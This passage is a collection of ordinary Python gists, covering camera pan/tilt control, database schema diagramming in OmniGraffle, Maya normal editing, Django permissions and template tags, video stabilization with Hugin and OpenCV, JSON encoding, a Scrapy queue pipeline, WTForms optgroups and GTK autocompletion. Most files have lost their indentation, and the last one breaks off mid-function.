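# Minimal sketch: the raw uvcdynctrl calls behind the GUI buttons above.
# Assumes uvcdynctrl lives at /usr/bin/uvcdynctrl and controls the default camera.
import subprocess

UVCDYNCTRLEXEC = "/usr/bin/uvcdynctrl"

subprocess.call([UVCDYNCTRLEXEC, "-s", "Pan (relative)", "--", "-100"])   # pan right
subprocess.call([UVCDYNCTRLEXEC, "-s", "Tilt (relative)", "--", "-100"])  # tilt up
subprocess.call([UVCDYNCTRLEXEC, "-s", "Pan/tilt Reset", "3"])            # re-centre
```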
#### File: hard-gists/1486762/snippet.py
```python
import sys
import re
from appscript import *
# from pg import DB
import _mysql
import string
####################################################
# Some default settings for OmniGraffle Graphics #
####################################################
# Common to title and all types of columns.
common_props = {}
common_props[ k.shadow_vector ] = [ 7.0, 7.0 ]
common_props[ k.shadow_fuzziness ] = 17.45
common_props[ k.autosizing ] = k.full
common_props[ k.text_placement ] = k.top
common_props[ k.draws_stroke ] = False
common_props[ k.fill ] = k.linear_fill
common_props[ k.fill_color ] = [ 1, 1, 1 ]
common_props[ k.gradient_center ] = [ 0.5, 0 ]
common_props[ k.magnets ] = [ [ 1, 0 ], [ -1, 0 ] ]
#common_props[ k.size ] = [ 90, 14 ]
#Table Name
table_name = common_props.copy()
table_name[ k.gradient_color ] = [ 0, 0, 1 ]
#Primary Keys
column_pkey = common_props.copy()
column_pkey[ k.gradient_color ] = [ 1, 0, 0 ]
#Foreign Keys
column_fkey = common_props.copy()
column_fkey[ k.gradient_color ] = [ 0, 1, 0 ]
#No Key
column_norm = common_props.copy()
column_norm[ k.gradient_color ] = [ 1, 1, 1 ]
#Line Properties
line_props = {}
line_props[ k.line_type ] = k.orthogonal
line_props[ k.head_type ] = "FilledArrow"
line_props[ k.jump ] = True
###########################################
# The query used to gather schema data. #
###########################################
query = """
select c.table_name,
c.column_name,
c.data_type,
c.is_nullable,
tc.constraint_type,
kcu.referenced_table_name,
kcu.referenced_column_name,
tc.constraint_name
from information_schema.columns as c
left join
information_schema.key_column_usage as kcu
on (
c.column_name = kcu.column_name
and c.table_schema = kcu.table_schema
and c.table_name = kcu.table_name
)
left join
information_schema.table_constraints as tc
on (
tc.constraint_name = kcu.constraint_name
and tc.table_schema = kcu.table_schema
and tc.table_name = kcu.table_name
)
where c.table_schema = 'SCHEMA_NAME'
group by
c.table_name,
c.column_name
order by
c.table_name,
c.ordinal_position
"""
#########################
# Method definitions. #
#########################
def parseArguments():
"""
I haven't taken the time to learn getopt, so I use regular expressions.
"""
options[ 'graffle' ] = 'OmniGraffle 5'
options[ 'dbhost' ] = 'localhost'
options[ 'dbport' ] = 5432
options[ 'dbuser' ] = ''
options[ 'dbpass' ] = ''
options[ 'dbname' ] = ''
options[ 'schema' ] = 'public'
for key in options:
value = options[key]
print "Enter %s (%s): " % (key, value)
data = raw_input()
if data: options[key] = data
options[ 'query' ] = re.compile( 'SCHEMA_NAME' ).sub( options[ 'dbname' ].lower(), query )
#Get the information we need to draw from the database
def getSchemaInfo( options, sql_tables, sql_references ):
"""
Connect to the database and retrieve our schema information.
"""
conn = _mysql.connect(host=options[ 'dbhost' ], user=options[ 'dbuser' ], db=options[ 'dbname' ], passwd=options['dbpass'])
conn.query( options[ 'query' ] )
rows = conn.store_result()
res = rows.fetch_row(0, 1)
for i in range( len( res ) ):
ftbl = res[i][ 'table_name' ]
fcol = res[i][ 'column_name' ]
type = res[i][ 'data_type' ]
nullable = res[i][ 'is_nullable' ]
keytype = res[i][ 'constraint_type' ]
ttbl = res[i][ 'referenced_table_name' ]
tcol = res[i][ 'referenced_column_name' ]
if not sql_tables.has_key( ftbl ):
sql_tables[ ftbl ] = []
sql_tables[ ftbl ] += [ [ fcol, type, nullable, keytype ] ]
if keytype == 'FOREIGN KEY' :
sql_references += [ [ ftbl, fcol, ttbl, tcol ] ]
#Create a table in OmniGraffle from database info
def createOGTableFromSQLTable( graffle, name, sql_table, og_tables ):
"""
Create a table in OmniGraffle using data from the database
"""
shapes = []
graphics = graffle.windows[1].document.canvases[1].graphics
graphics.end.make( new=k.shape, with_properties=table_name )
shape = graphics.last.get()
shape.text.set( name )
shapes += [ shape ]
use_props = None
for i in range( len( sql_table ) ):
if sql_table[i][3] == 'PRIMARY KEY' :
use_props = column_pkey
elif sql_table[i][3] == 'FOREIGN KEY' :
use_props = column_fkey
else :
use_props = column_norm
graphics.end.make( new=k.shape, with_properties=use_props )
shape = graphics.last.get()
shape.text.set( sql_table[i][0] )
shapes += [ shape ]
og_tables[ name.upper() ] = graffle.assemble( shapes, table_shape=[len( sql_table)+1,1] )
og_tables[ name.upper() ].slide( by={ k.x:25,k.y:25} )
#Get the source and destination graphics for a line to be drawn
def getOGGraphicsFromReference( sql_reference, og_tables ) :
ftbl = og_tables[ sql_reference[0].upper() ]
fg = None
for col in ftbl.columns[1].graphics.get() :
if( col.text.get() == sql_reference[1] ) :
fg = col.get() ;
break ;
else:
raise RuntimeError, "Failed to find graphic for " + sql_reference[0] + "( " + sql_reference[1] + " )"
ttbl = og_tables[ sql_reference[2].upper() ]
tg = None
for col in ttbl.columns[1].graphics.get() :
if( col.text.get() == sql_reference[3] ) :
tg = col.get() ;
break ;
else:
raise RuntimeError, "Failed to find graphic for " + sql_reference[2] + "( " + sql_reference[3] + " )"
return [ fg, tg ]
#Draw a line representing a reference in the database.
def createOGLineFromReference( graffle, sql_reference, og_tables ) :
tgs = getOGGraphicsFromReference( sql_reference, og_tables )
tgs[0].connect( to=tgs[1], with_properties=line_props )
#####################
# Run the script. #
#####################
options = {}
sql_tables = {}
sql_references = []
og_tables = {}
parseArguments()
graffle = app( options[ 'graffle' ] )
getSchemaInfo( options, sql_tables, sql_references )
for key in sql_tables.keys() :
createOGTableFromSQLTable( graffle, key, sql_tables[ key ], og_tables )
graffle.windows[1].document.canvases[1].layout_info.properties.set( { k.type:k.force_directed} )
graffle.windows[1].document.canvases[1].layout()
for i in range( len( sql_references ) ) :
createOGLineFromReference( graffle, sql_references[ i ], og_tables )
```
#### File: hard-gists/1522bcdb5b05365c0222/snippet.py
```python
import maya.cmds as cmds
#import edgeLord
#edgeLord.run()
def run():
#get selected edgeloop
edgeLoop = cmds.ls(selection=True)
#get vertices in the edge loop
vertLoop = cmds.polyListComponentConversion(edgeLoop, fromEdge=True, toVertex=True)
#sort individual vertices into a list
vertLoop = cmds.ls(vertLoop, flatten=True)
#open undo chunk so entire operation is a single action
cmds.undoInfo(openChunk = True)
#soften the mesh normals
mesh = cmds.listRelatives(parent=1)
cmds.polySoftEdge(mesh, angle=180)
#run on each vertex on the edgeloop
for vert in vertLoop:
#unlock the normal of the vertex
cmds.polyNormalPerVertex(vert, unFreezeNormal=True)
#get the normals of the vertex on the loop
vertNormals = list(cmds.polyNormalPerVertex(vert, query=True, xyz=True))
#get only the first three vectors
vertNormals = vertNormals[:3]
# select the neighboring vertices using the function declared below
vertNeighbors(vert, vertLoop)
#set their normal angle to match the vertex on the loop
cmds.polyNormalPerVertex(xyz=vertNormals)
#reselect the edge loops
cmds.select(edgeLoop)
#close undo chunk, operation is done
cmds.undoInfo(closeChunk = True)
# function to select a vertex's perpendicular neighbors
def vertNeighbors(vert, vertLoop):
#find the vertices connected to this vertex by edges
connectedEdges = cmds.polyListComponentConversion(vert, toEdge=True)
connectedVerts = cmds.polyListComponentConversion(connectedEdges, toVertex = True)
#select the connected vertices, then deselect the vertices on the loop
cmds.select(connectedVerts, replace = True)
cmds.select(vertLoop, deselect = True)
```
#### File: hard-gists/1545255/snippet.py
```python
from django.contrib.auth.models import Group
from djangorestframework.permissions import _403_FORBIDDEN_RESPONSE, BasePermission
class GroupBasePermission(BasePermission):
group_name = ""
def check_permission(self, user):
"""
Should simply return, or raise a 403 response.
"""
try:
user.groups.get(name=self.group_name)
except Group.DoesNotExist:
raise _403_FORBIDDEN_RESPONSE
class GroupAPIGETPermission(GroupBasePermission):
"""
Checks to see if a user is in a particular group
"""
group_name = "API GET"
class GroupAPIPOSTPermission(GroupBasePermission):
"""
Checks to see if a user is in a particular group
"""
group_name = "API POST"
```
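A hedged sketch of how these permission classes might be attached to a view under the pre-1.0 `djangorestframework` API the gist imports from; the `View` import path, the `permissions` attribute, and `ReportView` itself are assumptions rather than anything confirmed by the gist:
```python
# Hypothetical view using the group permissions above (old djangorestframework API).
from djangorestframework.views import View
from djangorestframework.permissions import IsAuthenticated


class ReportView(View):
    # Checked in order: the caller must be authenticated AND in the "API GET" group.
    permissions = (IsAuthenticated, GroupAPIGETPermission)

    def get(self, request):
        return {'status': 'ok'}
```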
#### File: hard-gists/1551619/snippet.py
```python
import sys
import os
import shutil
import tempfile
import subprocess
import numpy as np
import cv2
import hsi
def exec_shell(cmd_line, raise_on_err=False):
""" Execute a shell statement (as a string 'cmd_line')
in a subprocess and return (stdout, stderr) results
if 'raise_on_err': raise AssertionError if something was dumped to stderr
"""
out, err = subprocess.Popen(
cmd_line,
shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
assert not (raise_on_err and err), \
"Error: cmd=%s, stderr=%s" % (cmd_line, err)
return out.strip(), err.strip()
def pto_gen(img_fns, hfov=50, out_pto="project.pto"):
""" Generate a Hugin .pto project file
Parameters
----------
img_fns: list,
the (ordered) full paths to the video frames
hfov: int, optional, default: 50,
horizontal field of view in degrees
(around 50 is ok for most non-fish-eye cameras)
out_pto: string, optional, default: 'project.pto',
output path to the generated panotools .pto file
Notes
-----
Suitable as input for further tools such as the cpfind control-point generator.
Inspired from pto_gen
(http://hugin.sourceforge.net/docs/html/pto__gen_8cpp-source.html)
but with some hacks to correct the generated m-line in the header.
Uses the Hugin python scripting interface (http://wiki.panotools.org/Hugin_Scripting_Interface)
"""
# projection type: 0 == rectilinear (2 == equirectangular)
projection = 0
assert projection >= 0, "Invalid projection number (%d)" % projection
assert 1 <= hfov <= 360, "Invalid horizontal field of view (%d)" % hfov
# hugin Panorama object
pano = hsi.Panorama()
# add the images in order
for img_fn in img_fns:
src_img = hsi.SrcPanoImage(img_fn)
src_img.setProjection(projection)
src_img.setHFOV(hfov)
src_img.setExifCropFactor(1.0)
pano.addImage(src_img)
# check we added all of them
n_inserted = pano.getNrOfImages()
assert n_inserted == len(img_fns), "Didn't insert all images (%d < %d)" % \
(n_inserted, len(img_fns))
# output the .pto file
pano.writeData(hsi.ofstream(out_pto + '.tmp')) # same as pano.printPanoramaScript(...)
# some bug in header: rewrite it manually (TODO through hsi?)
with open(out_pto + '.tmp', 'r') as tmp_ff:
with open(out_pto, 'w' ) as ff:
# re-write the header
ff.write(tmp_ff.readline())
ff.write(tmp_ff.readline())
# force jpeg for the p-line
p_line = tmp_ff.readline().strip().split()
assert p_line[0] == 'p', "BUG: should be a p-line"
ff.write(' '.join(p_line[:7]) + ' n"JPEG q100"\n')
# remove extra 'f' param in the m-line
# (screws everything up if left here...)
m_line = tmp_ff.readline().strip().split()
assert m_line[0] == 'm', "BUG: should be a m-line"
ff.write(' '.join(m_line[:3]) + ' ' + ' '.join(m_line[4:]) + '\n')
# write all other lines
for l in tmp_ff.readlines():
ff.write(l)
os.remove(out_pto + '.tmp')
print "saved {0}".format(out_pto)
def get_surf_kps(img_fn, img=None, center_out=0.5,
cness_thresh=1000, min_pts=30, max_pts=300):
""" Return the opened gray-scale OpenCV image and its SURF keypoints
Points "in the middle" of the frames are left out
(center_out = proportioned of space left out).
"""
assert center_out < 1, "Too high center part to remove"
# initialize the SURF keypoint detector and descriptor
surf = cv2.SURF(cness_thresh)
# load the gray-scale image
if img is None:
img = cv2.imread(img_fn, 0)
# detect and describe SURF keypoints
cvkp, ds = surf.detect(img, None, False)
# re-arrange the data properly
ds.shape = (-1, surf.descriptorSize()) # reshape to (n_pts, desc_size)
kp = np.array([p.pt for p in cvkp])
cness = np.array([p.response for p in cvkp])
# filter out points in the middle (likely to be on the moving actor)
if center_out > 0:
rx = img.shape[1]
lb = center_out * 0.5 * rx
ub = (1 - center_out * 0.5) * rx
mask = (kp[:, 0] < lb) + (kp[:, 0] > ub)
kp = kp[mask, :]
ds = ds[mask, :]
cness = cness[mask]
# check we're within the limits
if kp.shape[0] < min_pts:
if cness_thresh > 100:
# redo the whole thing with a lower threshold
_, kp, ds = get_surf_kps(img_fn, img=img, center_out=center_out,
min_pts=min_pts, max_pts=max_pts,
cness_thresh=0.5 * cness_thresh)
else:
# we lowered the threshold too much and didn't find enough points
raise ValueError('Degenerate image (e.g. black) or too high center_out')
if kp.shape[0] > max_pts:
# too many points, take those with max cornerness only
cness_order = np.argsort(cness)[::-1]
kp = kp[cness_order[:max_pts], :]
ds = ds[cness_order[:max_pts], :]
return img, kp, ds
def get_pairwise_matches(pos1, descs1, pos2, descs2, up_to=30):
""" Get the matching local features from img1 to img2
"""
assert pos1.shape[0] * pos2.shape[0] < 1e8, \
"Too many points: increase cornerness threshold"
assert pos1.shape[0] > 10 and pos2.shape[0] > 10, \
"Not enough points: lower cornerness threshold"
# get the similarities between all descriptors
sims = np.dot(descs1, descs2.T)
# Note: in practice, using a kernel between histograms works better
# get the best matches
mi2 = sims.argmax(axis=1).squeeze()
ms = sims.max(axis=1).squeeze()
bmi1 = ms.argsort()[::-1][:up_to]
bmi2 = mi2[bmi1]
# return their positions
bp1 = pos1[bmi1]
bp2 = pos2[bmi2]
return bp1, bp2
def gen_pairwise_surf_control_points(proj_file, img_fns, display=False):
""" Use OpenCV for pairwaise image matching
cf. <opencv samples dir>/find_obj.py
"""
# get the kps of the first frame
img1, kp1, ds1 = get_surf_kps(img_fns[0])
# match the frame t with t+1
cpoints = []
for i2 in range(1, len(img_fns)):
# get the kps of frame t+1
img2, kp2, ds2 = get_surf_kps(img_fns[i2])
# get the control points
cp1, cp2 = get_pairwise_matches(kp1, ds1, kp2, ds2)
# estimate the homography
H, mask = cv2.findHomography(cp1, cp2, cv2.RANSAC)
mask = mask.squeeze() > 0
# display the matches and homography
if display:
hom_warp_image(img1, cp1, img2, cp2, H, mask)
# filter out the outlier matches
cp1 = cp1[mask]
cp2 = cp2[mask]
# add the control points
cpoints.extend([hsi.ControlPoint(i2 - 1, x1, y1, i2, x2, y2)
for (x1, y1), (x2, y2) in zip(cp1, cp2)])
# next -> cur
img1, kp1, ds1 = img2, kp2, ds2
# write to pto
pano = hsi.Panorama()
pano.readData(hsi.ifstream(proj_file))
pano.setCtrlPoints(cpoints)
pano.writeData(hsi.ofstream(proj_file))
def gen_control_points(proj_file, img_fns, hfov, method="surf"):
""" Generate control points by detecting and matching salient local features
"""
# initialize the pto project
pto_gen(img_fns, hfov=hfov, out_pto=proj_file)
if method == "surf":
# generate the control points with OpenCV's SURF + RANSAC
gen_pairwise_surf_control_points(proj_file, img_fns)
elif method == "cpfind":
# generate the control points with hugin's cpfind
# Note: not a good idea because forces points to be spread over the frame
# which forces points to be on the actor => we don't want that
opts = "-v -n 1" # 1 thread
# RANSAC to estimate homography
opts+= " --ransacmode hom"
#opts+= " --mulitrow" # multirow heuristics
# don't downscale image by 2
opts+= " --fullscale"
# --linearmatchlen 5" # match only pairs (t, t+1), ..., (t, t+n)
opts+= " --linearmatch"
# at most size pts per cell in w x h grid
opts+= " --sieve1width 5 --sieve1height 5 --sieve1size 10"
# at most size pts per cell in w x h grid
opts+= " --sieve2width 5 --sieve2height 5 --sieve2size 1"
cmd = "cpfind {opts} -o {pto} {pto}"
exec_shell(cmd.format(opts=opts, pto=proj_file))
elif method == "sift":
# with autopano-sift-c
cmd = "autopano-sift-c --ransac off --projection 0,{hfov} {pto} {imgs}"
exec_shell(cmd.format(hfov=hfov, pto=proj_file, imgs=' '.join(img_fns)))
else:
raise ValueError("Unknown method %s" % method)
def motion_stabilize_frames(img_fns, hfov=50, out_avi="out.avi"):
""" Motion stabilize a video
Parameters
----------
img_fns: list,
the (ordered) full paths to the video frames
hfov: int, optional, default: 50,
horizontal field of view in degrees
(around 50 is ok for most non-fish-eye cameras)
out_avi: string, optional, default: 'out.avi',
output path to the generated motion-stabilized video
Notes
-----
Uses opencv, hugin and ffmpeg.
"""
# create a temporary directory
tmpd = tempfile.mkdtemp(prefix='tmp_mostab_', dir='.')
# pano tools project file
proj_file = "%s/project.pto" % tmpd
try:
# generate the control points
gen_control_points(proj_file, img_fns, hfov)
# prune the control points TODO necessary?
#cmd = "cpclean -p -o {pto} {pto}"
#exec_shell(cmd.format(pto=proj_file))
# optimise geometric parameters only
cmd = "autooptimiser -p -s -o {pto}.optim.pto {pto}"
# Note: not '-l' as levelling can screw things up
exec_shell(cmd.format(pto=proj_file))
# remapping to create the distorted frames in the full scene plane
cmd = "nona -t 1 -m TIFF_m -o {tmpd}/remapped {pto}.optim.pto" # 1 thread
exec_shell(cmd.format(tmpd=tmpd, pto=proj_file))
# make a video from the tiff frames
cmd = "ffmpeg -y -f image2 -i {tmpd}/remapped%04d.tif -vcodec mjpeg -qscale 1 -an {avi}"
exec_shell(cmd.format(tmpd=tmpd, avi=out_avi), raise_on_err=False)
print "saved {0}".format(out_avi)
finally:
# clean up
shutil.rmtree(tmpd)
sys.stdout.flush()
# =============================================================================
# some visualization function based on opencv
# =============================================================================
def draw_match(img1, img2, p1, p2, mask=None, H=None):
""" Draw the matches found from img1 to img2
"""
h1, w1 = img1.shape[:2]
h2, w2 = img2.shape[:2]
vis = np.zeros((max(h1, h2), w1+w2), np.uint8)
vis[:h1, :w1] = img1
vis[:h2, w1:w1+w2] = img2
vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR)
if H is not None:
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32(
cv2.perspectiveTransform(
corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0))
cv2.polylines(vis, [corners], True, (255, 255, 255))
if mask is None:
mask = np.ones(len(p1), np.bool_)
green = (63, 255, 0)
red = (0, 0, 255)
for (x1, y1), (x2, y2), inlier in zip(np.int32(p1), np.int32(p2), mask):
col = [red, green][inlier]
if inlier:
cv2.line(vis, (x1, y1), (x2+w1, y2), col)
cv2.circle(vis, (x1, y1), 4, col, 2)
cv2.circle(vis, (x2+w1, y2), 4, col, 2)
else:
r = 2
thickness = 3
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
cv2.line(vis, (x2+w1-r, y2-r), (x2+w1+r, y2+r), col, thickness)
cv2.line(vis, (x2+w1-r, y2+r), (x2+w1+r, y2-r), col, thickness)
return vis
def hom_warp_image(img1, pts1, img2, pts2, hom, mask):
""" Show keypoint matches and the estimated homography
"""
# warp img2
if img2.ndim == 2:
img2 = img2[:,:,np.newaxis]
wimg2 = np.zeros_like(img2)
for chan in range(img2.shape[2]):
_i2 = np.ascontiguousarray(img2[:, :, chan], dtype="f4")
#wimg2[:,:,chan] = cv2.warpPerspective(_i2, hom, _i2.T.shape)
zz = cv2.warpPerspective(_i2, hom, _i2.T.shape)
zx, zy = np.where(zz > 0)
wimg2[zx, zy, chan] = zz[zx, zy]
wimg2 = wimg2.squeeze()
# warp the matches in img2
wpts2 = cv2.perspectiveTransform(pts2.reshape(1, -1, 2), hom).reshape(-1, 2)
# show the kept matches
vis = draw_match(img1, wimg2, pts1, wpts2, mask, hom)
cv2.imshow("match", vis)
cv2.waitKey()
if __name__ == "__main__":
if len(sys.argv) < 4:
print "usage: video_stabilization.py <out.avi> <frame 1> <frame 2> ..."
sys.exit(0)
out_avi = sys.argv[1]
img_fns = sys.argv[2:]
motion_stabilize_frames(img_fns, out_avi=out_avi)
```
#### File: hard-gists/1558831/snippet.py
```python
from vanilla import *
from NudgeCore import *
class interpolatedNudgeDialog(object):
_title = "Nudge"
_button_1 = 30
_button_2 = 20
_padding = 10
_width = (_button_1 * 3) + (_padding * 2) - 2
_height = (_button_1 * 4) + (_padding * 3) - 2
_nudge = 10
def __init__(self):
self.w = FloatingWindow(
(self._width,
self._height),
self._title)
self.w._up = SquareButton(
(self._button_1 + self._padding - 1,
self._padding,
self._button_1,
self._button_1),
"+",
callback=self._up_callback)
self.w._left = SquareButton(
(self._padding,
self._button_1 + self._padding - 1,
self._button_1,
self._button_1),
"-",
callback=self._left_callback)
self.w._right = SquareButton(
((self._button_1 * 2) + self._padding - 2,
self._button_1 + (self._padding - 1),
self._button_1,
self._button_1),
"+",
callback=self._right_callback)
self.w._down = SquareButton(
(self._button_1 + self._padding - 1,
(self._button_1 * 2) + (self._padding - 2),
self._button_1,
self._button_1),
"-",
callback=self._down_callback)
# nudge size
self.w._nudge_value = EditText(
(self._padding,
(self._button_1 * 3) + (self._padding * 2) + 5,
(self._width / 2) - (self._padding * 1.5),
20),
self._nudge,
sizeStyle='small',
readOnly=True)
self.w._nudge_plus = SquareButton(
(-self._padding - 20,
(self._button_1 * 3) + (self._padding * 2) + 5,
self._button_2,
self._button_2),
'+',
sizeStyle='small',
callback=self.nudge_plus_callback)
self.w._nudge_minus = SquareButton(
(-self._padding - 39,
(self._button_1 * 3) + (self._padding * 2) + 5,
self._button_2,
self._button_2),
'-',
sizeStyle='small',
callback=self.nudge_minus_callback)
# open dialog
self.w.open()
def nudge_minus_callback(self, sender):
_nudge = int(self.w._nudge_value.get()) - 10
if _nudge >= 0:
self._nudge = _nudge
self.w._nudge_value.set(self._nudge)
def nudge_plus_callback(self, sender):
self._nudge = int(self.w._nudge_value.get()) + 10
self.w._nudge_value.set(self._nudge)
def _left_callback(self, sender):
nudgeSelected((-self._nudge, 0))
def _right_callback(self, sender):
nudgeSelected((self._nudge, 0))
def _up_callback(self, sender):
nudgeSelected((0, self._nudge))
def _down_callback(self, sender):
nudgeSelected((0, -self._nudge))
# run
interpolatedNudgeDialog()
```
#### File: hard-gists/1572547/snippet.py
```python
import datetime
import simplejson
import time
from google.appengine.api import users
from ndb import model, query
class ModelEncoder(simplejson.JSONEncoder):
"""
Extends JSONEncoder to add support for NDB Models and query results.
Adds support to simplejson JSONEncoders for NDB Models and query results by
overriding JSONEncoder's default method.
"""
def default(self, obj):
"""Tests the input object, obj, to encode as JSON."""
if hasattr(obj, 'to_dict'):
return getattr(obj, 'to_dict')()
if isinstance(obj, query.Query):
return list(obj)
elif isinstance(obj, datetime.datetime):
return obj.isoformat()
elif isinstance(obj, time.struct_time):
return list(obj)
elif isinstance(obj, users.User):
output = {}
methods = ['nickname', 'email', 'auth_domain']
for method in methods:
output[method] = getattr(obj, method)()
return output
elif isinstance(obj, model.Key):
return obj.get()
return simplejson.JSONEncoder.default(self, obj)
def encode(input):
"""
Encode an input Model object as JSON
Args:
input: A Model object or DB property.
Returns:
A JSON string based on the input object.
Raises:
TypeError: Typically occurs when an input object contains an unsupported
type.
"""
return ModelEncoder().encode(input)
```
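A short usage sketch; the `Greeting` model and its properties are invented for illustration, and it relies on the instance exposing the `to_dict()` method that `ModelEncoder.default` checks for:
```python
# Hypothetical NDB model plus a helper that serializes a whole query result.
from ndb import model


class Greeting(model.Model):
    content = model.StringProperty()
    created = model.DateTimeProperty(auto_now_add=True)

    def to_dict(self):
        # ModelEncoder.default() looks for this method on model instances.
        return {'content': self.content, 'created': self.created}


def greetings_json():
    # The query.Query result and the datetime property are both handled above.
    return encode(Greeting.query())
```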
#### File: hard-gists/1574231/snippet.py
```python
from scrapy.xlib.pydispatch import dispatcher
from scrapy import signals
from scrapy.exceptions import DropItem
from scrapy.utils.serialize import ScrapyJSONEncoder
from carrot.connection import BrokerConnection
from carrot.messaging import Publisher
from twisted.internet.threads import deferToThread
class MessageQueuePipeline(object):
def __init__(self, host_name, port, userid, password, virtual_host, encoder_class):
self.q_connection = BrokerConnection(hostname=host_name, port=port,
userid=userid, password=password,
virtual_host=virtual_host)
self.encoder = encoder_class()
dispatcher.connect(self.spider_opened, signals.spider_opened)
dispatcher.connect(self.spider_closed, signals.spider_closed)
@classmethod
def from_settings(cls, settings):
host_name = settings.get('BROKER_HOST', 'localhost')
port = settings.get('BROKER_PORT', 5672)
userid = settings.get('BROKER_USERID', "guest")
password = settings.get('BROKER_PASSWORD', "<PASSWORD>")
virtual_host = settings.get('BROKER_VIRTUAL_HOST', "/")
encoder_class = settings.get('MESSAGE_Q_SERIALIZER', ScrapyJSONEncoder)
return cls(host_name, port, userid, password, virtual_host, encoder_class)
def spider_opened(self, spider):
self.publisher = Publisher(connection=self.q_connection,
exchange="", routing_key=spider.name)
def spider_closed(self, spider):
self.publisher.close()
def process_item(self, item, spider):
return deferToThread(self._process_item, item, spider)
def _process_item(self, item, spider):
self.publisher.send({"scraped_data": self.encoder.encode(dict(item))})
return item
```
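To enable the pipeline, a Scrapy project would list it in `ITEM_PIPELINES` and supply the broker settings read by `from_settings`; a sketch of the relevant `settings.py` fragment, where the dotted path `myproject.pipelines` is an assumption:
```python
# Hypothetical settings.py fragment enabling MessageQueuePipeline.
ITEM_PIPELINES = ['myproject.pipelines.MessageQueuePipeline']

# Broker connection settings consumed by MessageQueuePipeline.from_settings();
# the values shown are the RabbitMQ defaults, not anything taken from the gist.
BROKER_HOST = 'localhost'
BROKER_PORT = 5672
BROKER_USERID = 'guest'
BROKER_PASSWORD = 'guest'
BROKER_VIRTUAL_HOST = '/'
# MESSAGE_Q_SERIALIZER defaults to ScrapyJSONEncoder and can be overridden here.
```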
#### File: hard-gists/1590178/snippet.py
```python
from wtforms.fields import SelectField as BaseSelectField
from wtforms.validators import ValidationError
from wtforms.widgets import HTMLString, html_params, escape
from wtforms.widgets import Select as BaseSelectWidget
__all__ = ('SelectField', 'SelectWidget')
class SelectWidget(BaseSelectWidget):
"""
Add support of choices with ``optgroup`` to the ``Select`` widget.
"""
@classmethod
def render_option(cls, value, label, mixed):
"""
Render the option as an HTML tag, wrapping options into an
``optgroup`` tag if the ``label`` var is a ``list`` or ``tuple``.
"""
if isinstance(label, (list, tuple)):
children = []
for item_value, item_label in label:
item_html = cls.render_option(item_value, item_label, mixed)
children.append(item_html)
html = u'<optgroup label="%s">%s</optgroup>'
data = (escape(unicode(value)), u'\n'.join(children))
else:
coerce_func, data = mixed
selected = coerce_func(value) == data
options = {'value': value}
if selected:
options['selected'] = u'selected'
html = u'<option %s>%s</option>'
data = (html_params(**options), escape(unicode(label)))
return HTMLString(html % data)
class SelectField(BaseSelectField):
"""
Add support of ``optgroup`` choices to the default WTForms ``SelectField`` class.
So choices like the following are supported as well::
(
('Fruits', (
('apple', 'Apple'),
('peach', 'Peach'),
('pear', 'Pear')
)),
('Vegetables', (
('cucumber', 'Cucumber'),
('potato', 'Potato'),
('tomato', 'Tomato'),
))
)
"""
widget = SelectWidget()
def iter_choices(self):
"""
Update how choices are iterated so that a value coming from a
nested list or tuple can still be marked as selected.
"""
for value, label in self.choices:
yield (value, label, (self.coerce, self.data))
def pre_validate(self, form, choices=None):
"""
Don't forget to validate also values from embedded lists.
"""
default_choices = choices is None
choices = choices or self.choices
for value, label in choices:
found = False
if isinstance(label, (list, tuple)):
found = self.pre_validate(form, label)
if found or value == self.data:
return True
if not default_choices:
return False
raise ValidationError(self.gettext(u'Not a valid choice'))
```
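A small, hypothetical form exercising the grouped choices from the docstring (the form and field names are invented):
```python
# Hypothetical WTForms form using the optgroup-aware SelectField defined above.
from wtforms import Form


class ProduceForm(Form):
    produce = SelectField(u'Produce', choices=[
        ('Fruits', (
            ('apple', 'Apple'),
            ('peach', 'Peach'),
            ('pear', 'Pear'),
        )),
        ('Vegetables', (
            ('cucumber', 'Cucumber'),
            ('potato', 'Potato'),
            ('tomato', 'Tomato'),
        )),
    ])

# str(ProduceForm().produce) renders the nested choices wrapped in <optgroup> tags.
```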
#### File: hard-gists/1628838/snippet.py
```python
from django.conf import settings
from django import template
register = template.Library()
class OnlySomethingNode(template.Node):
def __init__(self, nodelist, value='LIVE'):
self.nodelist = nodelist
self.value = value
def render(self, context):
if getattr(settings, 'DEPLOY_ENVIRONMENT', 'DEV') == self.value:
return self.nodelist.render(context)
return ''
@register.tag
def onlylive(parser, token):
nodelist = parser.parse(('endonlylive',))
parser.delete_first_token()
return OnlySomethingNode(nodelist, 'LIVE')
@register.tag
def onlydev(parser, token):
nodelist = parser.parse(('endonlydev',))
parser.delete_first_token()
return OnlySomethingNode(nodelist, 'DEV')
```
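Assuming the module is installed as a template tag library (the library name `envtags` is an assumption), the tags can be exercised directly from Python as a quick check:
```python
# Hypothetical check of the onlylive/onlydev tags; assumes this module is
# registered as "envtags" inside an installed app's templatetags package.
from django.template import Context, Template

t = Template(
    "{% load envtags %}"
    "{% onlylive %}<script src='analytics.js'></script>{% endonlylive %}"
    "{% onlydev %}<p>debug build</p>{% endonlydev %}"
)
# Which branch survives depends on settings.DEPLOY_ENVIRONMENT ('LIVE' vs 'DEV').
print t.render(Context({}))
```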
#### File: hard-gists/1650115/snippet.py
```python
import pygtk
pygtk.require("2.0")
import gobject
import gtk
from gtk import gdk
class EntryMultiCompletion(gtk.Entry):
def __init__(self):
gtk.Entry.__init__(self)
self.completion = gtk.EntryCompletion()
# customize the matching function to match multiple space
# separated words
self.completion.set_match_func(self.match_func, None)
# handle the match-selected signal, raised when a completion
# is selected from the popup
self.completion.connect("match-selected", self.on_completion_match)
self.set_completion(self.completion)
def match_func(self, completion, key_string, iter, data):
model = self.completion.get_model()
# get the completion strings
modelstr = model[iter][0]
# check if the user has typed in a space char,
# get the last word and check if it matches something
if " " in key_string:
last_word = key_string.split()[-1]
return modelstr.startswith(last_word)
# we have only one word typed
return modelstr.startswith(key_string)
def on_completion_match(self, completion, model, iter):
current_text = self.get_text()
# if more than a word has been typed, we throw away the
# last one because we want to replace it with the matching word
# note: the user may have typed only a part of the entire word
# and so this step is necessary
if " " in current_text:
current_text = " ".join(current_text.split()[:-1])
current_text = "%s %s" % (current_text, model[iter][0])
else:
current_text = model[iter][0]
# add the matching word
